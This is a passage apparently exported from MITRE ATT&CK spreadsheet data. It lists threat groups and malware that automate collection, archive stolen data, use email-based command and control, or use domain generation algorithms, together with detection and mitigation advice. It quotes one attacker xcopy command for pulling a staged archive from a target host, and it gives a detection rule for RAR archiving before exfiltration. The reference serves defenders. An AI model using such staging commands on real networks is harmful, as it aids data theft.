[FIN6](https://attack.mitre.org/groups/G0037) has used a script to iterate through a list of compromised PoS systems, copy and remove data to a log file, and to bind to events from the submit payment button.(Citation: FireEye FIN6 April 2016)(Citation: Trend Micro FIN6 October 2019)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has deployed scripts on compromised systems that automatically scan for interesting documents.(Citation: ESET Gamaredon June 2020)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) has performed frequent and scheduled data collection from victim networks.(Citation: Microsoft NICKEL December 2021)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) used custom batch scripts to collect files automatically from a targeted system.(Citation: Secureworks BRONZE PRESIDENT December 2019)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used automated collection.(Citation: Unit42 OilRig Playbook 2023)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) developed a file stealer to search C:\ and collect files with certain extensions. [Patchwork](https://attack.mitre.org/groups/G0040) also executed a script to enumerate all drives, store them as a list, and upload generated files to the C2 server.(Citation: TrendMicro Patchwork Dec 2017)
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has used tools to automatically collect system and network configuration information.(Citation: ATT Sidewinder January 2021)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) ran a command to compile an archive of file types of interest from the victim user's directories.(Citation: SecureWorks BRONZE UNION June 2017)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) has collected information automatically using the adversary's [USBferry](https://attack.mitre.org/software/S0452) attack.(Citation: TrendMicro Tropic Trooper May 2020)	
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has used the Csvde tool to collect Active Directory files and data.(Citation: Symantec Cicada November 2020)
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) has automatically collected data from USB drives, keystrokes, and screen images before exfiltration.(Citation: KISA Operation Muzabi)
Attor
[Attor](https://attack.mitre.org/software/S0438) has automatically collected data about the compromised system.(Citation: ESET Attor Oct 2019)
BADNEWS
[BADNEWS](https://attack.mitre.org/software/S0128) monitors USB devices and copies files with certain extensions to a predefined directory.(Citation: TrendMicro Patchwork Dec 2017)
Bankshot
[Bankshot](https://attack.mitre.org/software/S0239) recursively generates a list of files within a directory and sends them back to the control server.(Citation: McAfee Bankshot)
Comnie
[Comnie](https://attack.mitre.org/software/S0244) executes a batch script to store discovery information in %TEMP%\info.dat and then uploads the temporarily file to the remote C2 server.(Citation: Palo Alto Comnie)
Crutch
[Crutch](https://attack.mitre.org/software/S0538) can automatically monitor removable drives in a loop and copy interesting files.(Citation: ESET Crutch December 2020)
Empire
[Empire](https://attack.mitre.org/software/S0363) can automatically gather the username, domain name, machine name, and other information from a compromised system.(Citation: Talos Frankenstein June 2019)
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) can monitor files for changes and automatically collect them.(Citation: Bitdefender FunnyDream Campaign November 2020)
GoldFinder
[GoldFinder](https://attack.mitre.org/software/S0597) logged and stored information related to the route or hops a packet took from a compromised machine to a hardcoded C2 server, including the target C2 URL, HTTP response/status code, HTTP response headers and values, and data received from the C2 node.(Citation: MSTIC NOBELIUM Mar 2021)  
Helminth
A [Helminth](https://attack.mitre.org/software/S0170) VBScript receives a batch script to execute a set of commands in a command prompt.(Citation: Palo Alto OilRig May 2016)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can sort and collect specific documents as well as generate a list of all files on a newly inserted drive and store them in an encrypted file.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)
LightNeuron
[LightNeuron](https://attack.mitre.org/software/S0395) can be configured to automatically collect files under a specified directory.(Citation: ESET LightNeuron May 2019)
MESSAGETAP
[MESSAGETAP](https://attack.mitre.org/software/S0443) checks two files, keyword_parm.txt and parm.txt, for instructions on how to target and save data parsed and extracted from SMS message data from the network traffic. If an SMS message contained either a phone number, IMSI number, or keyword that matched the predefined list, it is saved to a CSV file for later theft by the threat actor.(Citation: FireEye MESSAGETAP October 2019)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) has automatically collected mouse clicks, continuous screenshots on the machine, and set timers to collect the contents of the clipboard and website browsing.(Citation: FireEye Metamorfo Apr 2018) 
Micropsia
[Micropsia](https://attack.mitre.org/software/S0339) executes an RAR tool to recursively archive files based on a predefined list of file extensions (*.xls, *.xlsx, *.csv, *.odt, *.doc, *.docx, *.ppt, *.pptx, *.pdf, *.mdb, *.accdb, *.accde, *.txt).(Citation: Radware Micropsia July 2018)
Mythic
[Mythic](https://attack.mitre.org/software/S0699) supports scripting of file downloads from agents.(Citation: Mythc Documentation)	
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) can automatically archive collected data.(Citation: Red Canary NETWIRE January 2020)
OutSteel
[OutSteel](https://attack.mitre.org/software/S1017) can automatically scan for and collect files with specific extensions.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
Pacu
[Pacu](https://attack.mitre.org/software/S1091) can automatically collect data, such as CloudFormation templates, EC2 user data, AWS Inspector reports, and IAM credential reports.(Citation: GitHub Pacu)
PoetRAT
[PoetRAT](https://attack.mitre.org/software/S0428) used file system monitoring to track modification and enable automatic exfiltration.(Citation: Talos PoetRAT April 2020)
PoshC2
[PoshC2](https://attack.mitre.org/software/S0378) contains a module for recursively parsing through files and directories to gather valid credit card numbers.(Citation: GitHub PoshC2)
Proxysvc
[Proxysvc](https://attack.mitre.org/software/S0238) automatically collects data about the victim and sends it to the control server.(Citation: McAfee GhostSecret)
ROADTools
[ROADTools](https://attack.mitre.org/software/S0684) automatically gathers data from Azure AD environments using the Azure Graph API.(Citation: Roadtools)
RTM
[RTM](https://attack.mitre.org/software/S0148) monitors browsing activity and automatically captures screenshots if a victim browses to a URL matching one of a list of strings.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)
Ramsay
[Ramsay](https://attack.mitre.org/software/S0458) can conduct an initial scan for Microsoft Word documents on the local system, removable media, and connected network drives, before tagging and collecting them. It can continue tagging documents to collect with follow up scans.(Citation: Eset Ramsay May 2020)	
RotaJakiro
Depending on the Linux distribution, [RotaJakiro](https://attack.mitre.org/software/S1078) executes a set of commands to collect device information and sends the collected information to the C2 server.(Citation: RotaJakiro 2021 netlab360 analysis)
Rover
[Rover](https://attack.mitre.org/software/S0090) automatically collects files from the local system and removable drives based on a predefined list of file extensions on a regular timeframe.(Citation: Palo Alto Rover)
ShimRatReporter
[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered information automatically, without instruction from a C2, related to the user and host machine that is compiled into a report and sent to the operators.(Citation: FOX-IT May 2016 Mofang)
StrongPity
[StrongPity](https://attack.mitre.org/software/S0491) has a file searcher component that can automatically collect and archive files based on a predefined list of file extensions.(Citation: Bitdefender StrongPity June 2020)
T9000
[T9000](https://attack.mitre.org/software/S0098) searches removable storage devices for files with a pre-defined list of file extensions (e.g. * .doc, *.ppt, *.xls, *.docx, *.pptx, *.xlsx). Any matching files are encrypted and written to a local user directory.(Citation: Palo Alto T9000 Feb 2016)
TajMahal
[TajMahal](https://attack.mitre.org/software/S0467) has the ability to index and compress files into a send queue for exfiltration.(Citation: Kaspersky TajMahal April 2019)
USBStealer
For all non-removable drives on a victim, [USBStealer](https://attack.mitre.org/software/S0136) executes automated collection of certain files for later exfiltration.(Citation: ESET Sednit USBStealer 2014)
VERMIN
[VERMIN](https://attack.mitre.org/software/S0257) saves each collected file with the automatically generated format {0:dd-MM-yyyy}.txt .(Citation: Unit 42 VERMIN Jan 2018)
Valak
[Valak](https://attack.mitre.org/software/S0476) can download a module to search for and build a report of harvested credential data.(Citation: SentinelOne Valak June 2020)
WindTail
[WindTail](https://attack.mitre.org/software/S0466) can identify and add files that possess specific file extensions to an array for archiving.(Citation: objective-see windtail2 jan 2019)
Zebrocy
[Zebrocy](https://attack.mitre.org/software/S0251) scans the system and automatically collects files with the following extensions: .doc, .docx, ,.xls, .xlsx, .pdf, .pptx, .rar, .zip, .jpg, .jpeg, .bmp, .tiff, .kum, .tlg, .sbx, .cr, .hse, .hsf, and .lhz.(Citation: ESET Zebrocy Nov 2018)(Citation: ESET Zebrocy May 2019)
ccf32
[ccf32](https://attack.mitre.org/software/S1043) can be used to automatically collect files from a compromised host.(Citation: Bitdefender FunnyDream Campaign November 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for actions that will aid in compression or encrypting data that is collected prior to exfiltration, such as tar. 
File Creation
Monitor newly constructed files being written with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.
Process Creation
Monitor for newly constructed processes and/or command-lines that aid in compression or encrypting data that is collected prior to exfiltration, such as 7-Zip, WinRAR, and WinZip. Before [Exfiltration](https://attack.mitre.org/tactics/TA0010) that an adversary has [Collection](https://attack.mitre.org/tactics/TA0009), it is very likely that a [Archive Collected Data](https://attack.mitre.org/techniques/T1560) will be created, so that transfer times are minimized and fewer files are transmitted. There is variety between the tools used to compress data, but the command line usage and context of archiving tools, such as ZIP, RAR, and 7ZIP, should be monitored.
In addition to looking for RAR or 7z program names, command line usage of 7Zip or RAR can be detected with the flag usage of “\* a \*”. This is helpful, as adversaries may change program names.
Note: This analytic looks for the command line argument a, which is used by RAR. However, there may be other programs that have this as a legitimate argument and may need to be filtered out.
&lt;h4&gt;Analytic 1 - Command Line Usage of Archiving Software&lt;/h4&gt;
&lt;code&gt; rar_argument = filter processes where (command_line == "* a *")&lt;/code&gt;
Audit
System scans can be performed to identify unauthorized archival utilities.
C0026
During [C0026](https://attack.mitre.org/campaigns/C0026), the threat actors used WinRAR to collect documents on targeted systems. The threat actors appeared to only exfiltrate files created after January 1, 2021.(Citation: Mandiant Suspected Turla Campaign February 2023)
FunnyDream
During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used 7zr.exe to add collected files to an archive.(Citation: Bitdefender FunnyDream Campaign November 2020)
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the Makecab utility to compress and a version of WinRAR to create password-protected archives of stolen data prior to exfiltration.(Citation: Cybereason OperationCuckooBees May 2022)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) archived victim's data into a RAR file.(Citation: ESET Lazarus Jun 2020)
Operation Honeybee
During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors uses zip to pack collected files before exfiltration.(Citation: McAfee Honeybee)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors archived collected files with WinRAR, prior to exfiltration.(Citation: FoxIT Wocao December 2019)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used 7-Zip to compress stolen emails into password-protected archives prior to exfltration; [APT29](https://attack.mitre.org/groups/G0016) also compressed text files into zipped archives.(Citation: Volexity SolarWinds)(Citation: Microsoft Deep Dive Solorigate January 2021)(Citation: CrowdStrike StellarParticle January 2022)
APT1
[APT1](https://attack.mitre.org/groups/G0006) has used RAR to compress files before moving them outside of the victim network.(Citation: Mandiant APT1)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has used a variety of utilities, including WinRAR, to archive collected data with password protection.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
APT3
[APT3](https://attack.mitre.org/groups/G0022) has used tools to compress data before exfilling it.(Citation: aptsim)
APT33
[APT33](https://attack.mitre.org/groups/G0064) has used WinRAR to compress data prior to exfil.(Citation: Symantec Elfin Mar 2019)	
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used WinRAR and 7-Zip to compress an archive stolen data.(Citation: FireEye APT39 Jan 2019)
APT41
[APT41](https://attack.mitre.org/groups/G0096) created a RAR archive of targeted files for exfiltration.(Citation: FireEye APT41 Aug 2019)
Aquatic Panda
[Aquatic Panda](https://attack.mitre.org/groups/G0143) has used WinRAR to compress memory dumps prior to exfiltration.(Citation: CrowdStrike AQUATIC PANDA December 2021)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has compressed data into password-protected RAR archives prior to exfiltration.(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used gzip for Linux OS and a modified RAR software to archive data on Windows hosts.(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)
CopyKittens
[CopyKittens](https://attack.mitre.org/groups/G0052) uses ZPP, a .NET console program, to compress files with ZIP.(Citation: ClearSky Wilted Tulip July 2017)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) has used WinRAR to compress stolen files into an archive prior to exfiltration.(Citation: TrendMicro EarthLusca 2022)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has compressed the dump output of compromised credentials with a 7zip binary.(Citation: Sygnia Elephant Beetle Jan 2022)
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has used RAR to compress collected data before exfiltration.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has used 7-Zip to archive data.(Citation: CISA AA20-259A Iran-Based Actor September 2020)
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) used WinRAR to compress and encrypt stolen data prior to exfiltration.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)
Gallmaker
[Gallmaker](https://attack.mitre.org/groups/G0084) has used WinZip, likely to archive data prior to exfiltration.(Citation: Symantec Gallmaker Oct 2018)
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has used 7-Zip and WinRAR to compress stolen files for exfiltration.(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) is known to use 7Zip and RAR with passwords to encrypt data prior to exfiltration.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: Microsoft NICKEL December 2021)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used QuickZip to archive stolen files before exfiltration.(Citation: Talos Kimsuky Nov 2021)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has used gzip to archive dumped LSASS process memory and RAR to stage and compress local folders.(Citation: FireEye APT35 2018)(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used the native Windows cabinet creation tool, makecab.exe, likely to compress stolen data to be uploaded.(Citation: Symantec MuddyWater Dec 2018)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has used RAR to create password-protected archives of collected documents prior to exfiltration.(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Avira Mustang Panda January 2020)
Sowbug
[Sowbug](https://attack.mitre.org/groups/G0054) extracted documents and bundled them into a RAR archive.(Citation: Symantec Sowbug Nov 2017)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has encrypted files stolen from connected USB drives into a RAR file before exfiltration.(Citation: Symantec Waterbug Jun 2019)
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has archived the ntds.dit database as a multi-volume password-protected archive with 7-Zip.(Citation: Secureworks BRONZE SILHOUETTE May 2023)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has archived data into ZIP files on compromised machines.(Citation: Mandiant FIN12 Oct 2021)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has compressed files before exfiltration using TAR and RAR.(Citation: PWC Cloud Hopper April 2017)(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Symantec Cicada November 2020)
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) can zip and encrypt data collected on a target system.(Citation: Malwarebytes Kimsuky June 2021)
CORALDECK
[CORALDECK](https://attack.mitre.org/software/S0212) has created password-protected RAR, WinImage, and zip archives to be exfiltrated.(Citation: FireEye APT37 Feb 2018)
Calisto
[Calisto](https://attack.mitre.org/software/S0274) uses the &lt;code&gt;zip -r&lt;/code&gt; command to compress the data collected on the local system.(Citation: Securelist Calisto July 2018)(Citation: Symantec Calisto July 2018)
Crutch
[Crutch](https://attack.mitre.org/software/S0538) has used the WinRAR utility to compress and encrypt stolen files.(Citation: ESET Crutch December 2020)
Daserf
[Daserf](https://attack.mitre.org/software/S0187) hides collected data in password-protected .rar archives.(Citation: Symantec Tick Apr 2016)
DustySky
[DustySky](https://attack.mitre.org/software/S0062) can compress files via RAR while staging data to be exfiltrated.(Citation: Kaspersky MoleRATs April 2019)
IceApple
[IceApple](https://attack.mitre.org/software/S1022) can encrypt and compress files using Gzip prior to exfiltration.(Citation: CrowdStrike IceApple May 2022)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) uses WinRAR to compress data that is intended to be exfiltrated.(Citation: ESET InvisiMole June 2018)
Micropsia
[Micropsia](https://attack.mitre.org/software/S0339) creates a RAR archive based on collected files on the victim's machine.(Citation: Radware Micropsia July 2018)
Octopus
[Octopus](https://attack.mitre.org/software/S0340) has compressed data before exfiltrating it using a tool called Abbrevia.(Citation: ESET Nomadic Octopus 2018) 
Okrum
[Okrum](https://attack.mitre.org/software/S0439) was seen using a RAR archiver tool to compress/decompress data.(Citation: ESET Okrum July 2019)
OopsIE
[OopsIE](https://attack.mitre.org/software/S0264) compresses collected files with GZipStream before sending them to its C2 server.(Citation: Unit 42 OopsIE! Feb 2018)
PUNCHBUGGY
[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has Gzipped information and saved it to a random temp file before exfil.(Citation: Morphisec ShellTea June 2019)	
PoetRAT
[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to compress files with zip.(Citation: Talos PoetRAT April 2020)
PoshC2
[PoshC2](https://attack.mitre.org/software/S0378) contains a module for compressing data using ZIP.(Citation: GitHub PoshC2)
PowerShower
[PowerShower](https://attack.mitre.org/software/S0441) has used 7Zip to compress .txt, .pdf, .xls or .doc files prior to exfiltration.(Citation: Kaspersky Cloud Atlas August 2019)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) can compress data with Zip before sending it over C2.(Citation: GitHub Pupy)
Ramsay
[Ramsay](https://attack.mitre.org/software/S0458) can compress and archive collected files using WinRAR.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)
Rclone
[Rclone](https://attack.mitre.org/software/S1040) can compress files using `gzip` prior to exfiltration.(Citation: Rclone)
Turian
[Turian](https://attack.mitre.org/software/S0647) can use WinRAR to create a password-protected archive for files of interest.(Citation: ESET BackdoorDiplomacy Jun 2021)
WindTail
[WindTail](https://attack.mitre.org/software/S0466) has the ability to use the macOS built-in zip utility to archive files.(Citation: objective-see windtail2 jan 2019)
ccf32
[ccf32](https://attack.mitre.org/software/S1043) has used `xcopy \\&lt;target_host&gt;\c$\users\public\path.7z c:\users\public\bin\&lt;target_host&gt;.7z /H /Y` to archive collected files.(Citation: Bitdefender FunnyDream Campaign November 2020)
certutil
[certutil](https://attack.mitre.org/software/S0160) may be used to Base64 encode collected data.(Citation: TechNet Certutil)(Citation: LOLBAS Certutil)
iKitten
[iKitten](https://attack.mitre.org/software/S0278) will zip up the /Library/Keychains directory before exfiltrating it.(Citation: objsee mac malware 2017)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts or uncommon data flows. Consider analyzing packet contents to detect application layer protocols, leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g. unauthorized, gratuitous, or anomalous traffic patterns attempting to access configuration content)
Network Traffic Content
Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g. unauthorized, gratuitous, or anomalous traffic patterns attempting to access configuration content)
Encrypt Sensitive Information
Configure SNMPv3 to use the highest level of security (authPriv) available.(Citation: US-CERT TA17-156A SNMP Abuse 2017)
Filter Network Traffic
Apply extended ACLs to block unauthorized protocols outside the trusted network.(Citation: US-CERT TA17-156A SNMP Abuse 2017)
Network Intrusion Prevention
Configure intrusion prevention devices to detect SNMP queries and commands from unauthorized sources.(Citation: US-CERT-TA18-106A)
Network Segmentation
Segregate SNMP traffic on a separate management network.(Citation: US-CERT TA17-156A SNMP Abuse 2017)
Software Configuration
Allowlist MIB objects and implement SNMP views.(Citation: Cisco Securing SNMP)
Update Software
Keep system images and software updated and migrate to SNMPv3.(Citation: Cisco Blog Legacy Device Attacks)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Traffic Content
Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for encrypted traffic,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and analyze traffic flows that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, or gratuitous or anomalous traffic patterns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).
Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. 
APT28
[APT28](https://attack.mitre.org/groups/G0007) has used IMAP, POP3, and SMTP for a communication channel in various implants, including using self-registered Google Mail accounts and later compromised email servers of its victims.(Citation: FireEye APT28)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has used email for C2 via an Office macro.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used e-mail to send exfiltrated data to C2 servers.(Citation: CISA AA20-301A Kimsuky)
SilverTerrier
[SilverTerrier](https://attack.mitre.org/groups/G0083) uses SMTP for C2 communications.(Citation: Unit42 SilverTerrier 2018)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has used multiple backdoors which communicate with a C2 server via email attachments.(Citation: Crowdstrike GTR2020 Mar 2020)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) has used SMTP for C2 communications.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla June 2017)(Citation: Bitdefender Agent Tesla April 2020)
BadPatch
[BadPatch](https://attack.mitre.org/software/S0337) uses SMTP for C2.(Citation: Unit 42 BadPatch Oct 2017)
CHOPSTICK
Various implementations of [CHOPSTICK](https://attack.mitre.org/software/S0023) communicate with C2 over SMTP and POP3.(Citation: ESET Sednit Part 2)
CORESHELL
[CORESHELL](https://attack.mitre.org/software/S0137) can communicate over SMTP and POP3 for C2.(Citation: FireEye APT28)(Citation: Microsoft SIR Vol 19)
Cannon
[Cannon](https://attack.mitre.org/software/S0351) uses SMTP/S and POP3/S for C2 communications by sending and receiving emails.(Citation: Unit42 Cannon Nov 2018)
ComRAT
[ComRAT](https://attack.mitre.org/software/S0126) can use email attachments for command and control.(Citation: ESET ComRAT May 2020)
Goopy
[Goopy](https://attack.mitre.org/software/S0477) has the ability to use a Microsoft Outlook backdoor macro to communicate with its C2.(Citation: Cybereason Cobalt Kitty 2017)	
JPIN
[JPIN](https://attack.mitre.org/software/S0201) can send email over SMTP.(Citation: Microsoft PLATINUM April 2016)
LightNeuron
[LightNeuron](https://attack.mitre.org/software/S0395) uses SMTP for C2.(Citation: ESET LightNeuron May 2019)
NavRAT
[NavRAT](https://attack.mitre.org/software/S0247) uses the email platform, Naver, for C2 communications, leveraging SMTP.(Citation: Talos NavRAT May 2018)
NightClub
[NightClub](https://attack.mitre.org/software/S1090) can use emails for C2 communications.(Citation: MoustachedBouncer ESET August 2023)
OLDBAIT
[OLDBAIT](https://attack.mitre.org/software/S0138) can use SMTP for C2.(Citation: FireEye APT28)
RDAT
[RDAT](https://attack.mitre.org/software/S0495) can use email attachments for C2 communications.(Citation: Unit42 RDAT July 2020)
Remsec
[Remsec](https://attack.mitre.org/software/S0125) is capable of using SMTP for C2.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)(Citation: Kaspersky ProjectSauron Technical Analysis)
SUGARDUMP
A [SUGARDUMP](https://attack.mitre.org/software/S1042) variant used SMTP for C2.(Citation: Mandiant UNC3890 Aug 2022)
Uroburos
[Uroburos](https://attack.mitre.org/software/S0022) can use custom communications protocols that ride over SMTP.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)
Zebrocy
[Zebrocy](https://attack.mitre.org/software/S0251) uses SMTP and POP3 for C2.(Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: ESET Zebrocy Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: ESET Zebrocy May 2019)(Citation: Accenture SNAKEMACKEREL Nov 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">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APT12
[APT12](https://attack.mitre.org/groups/G0005) has used multiple variants of [DNS Calculation](https://attack.mitre.org/techniques/T1568/003) including multiplying the first two octets of an IP address and adding the third octet to that value in order to get a resulting command and control port.(Citation: Meyers Numbered Panda)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Traffic Flow
Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more. (Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA. (Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated(Citation: Elastic Predicting DGA)]
Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Malware researchers can reverse engineer malware variants that use DGAs and determine future domains that the malware will attempt to contact, but this is a time and resource intensive effort.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA Brute Force) Malware is also increasingly incorporating seed values that can be unique for each instance, which would then need to be determined to extract future generated domains. In some cases, the seed that a particular sample uses can be extracted from DNS traffic.(Citation: Akamai DGA Mitigation) Even so, there can be thousands of possible domains generated per day; this makes it impractical for defenders to preemptively register all possible C2 domains due to the cost.
Restrict Web-Based Content
In some cases a local DNS sinkhole may be used to help prevent DGA-based command and control at a reduced cost.
APT41
[APT41](https://attack.mitre.org/groups/G0096) has used DGAs to change their C2 servers monthly.(Citation: FireEye APT41 Aug 2019)
TA551
[TA551](https://attack.mitre.org/groups/G0127) has used a DGA to generate URLs from executed macros.(Citation: Unit 42 TA551 Jan 2021)(Citation: Secureworks GOLD CABIN)
Aria-body
[Aria-body](https://attack.mitre.org/software/S0456) has the ability to use a DGA for C2 communications.(Citation: CheckPoint Naikon May 2020)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) has used a DGA in C2 communications.(Citation: Cybereason Astaroth Feb 2019)
BONDUPDATER
[BONDUPDATER](https://attack.mitre.org/software/S0360) uses a DGA to communicate with command and control servers.(Citation: FireEye APT34 Dec 2017)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can implement DGA using the current date as a seed variable.(Citation: Cybereason Bazar July 2020)
CCBkdr
[CCBkdr](https://attack.mitre.org/software/S0222) can use a DGA for [Fallback Channels](https://attack.mitre.org/techniques/T1008) if communications with the primary command and control server are lost.(Citation: Talos CCleanup 2017)
CHOPSTICK
[CHOPSTICK](https://attack.mitre.org/software/S0023) can use a DGA for [Fallback Channels](https://attack.mitre.org/techniques/T1008), domains are generated by concatenating words from lists.(Citation: ESET Sednit 2017 Activity)
Conficker
[Conficker](https://attack.mitre.org/software/S0608) has used a DGA that seeds with the current UTC victim system date to generate domains.(Citation: SANS Conficker)(Citation: Trend Micro Conficker)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) has used a DGA to generate a domain name for C2.(Citation: Prevailion DarkWatchman 2021)
Doki
[Doki](https://attack.mitre.org/software/S0600) has used the DynDNS service and a DGA based on the Dogecoin blockchain to generate C2 domains.(Citation: Intezer Doki July 20)
Ebury
[Ebury](https://attack.mitre.org/software/S0377) has used a DGA to generate a domain name for C2.(Citation: ESET Ebury Feb 2014)(Citation: ESET Ebury Oct 2017)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can use a DGA for hiding C2 addresses, including use of an algorithm with a user-specific key that changes daily.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: ESET Grandoreiro April 2020)
Milan
[Milan](https://attack.mitre.org/software/S1015) can use hardcoded domains as an input for domain generation algorithms.(Citation: Accenture Lyceum Targets November 2021)
MiniDuke
[MiniDuke](https://attack.mitre.org/software/S0051) can use DGA to generate new Twitter URLs for C2.(Citation: ESET Dukes October 2019)
POSHSPY
[POSHSPY](https://attack.mitre.org/software/S0150) uses a DGA to derive command and control URLs from a word list.(Citation: FireEye POSHSPY April 2017)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can use domain generation algorithms in C2 communication.(Citation: Trend Micro Qakbot May 2020)
ShadowPad
[ShadowPad](https://attack.mitre.org/software/S0596) uses a DGA that is based on the day of the month for C2 servers.(Citation: Securelist ShadowPad Aug 2017)(Citation: Kaspersky ShadowPad Aug 2017)(Citation: FireEye APT41 Aug 2019)
Shark
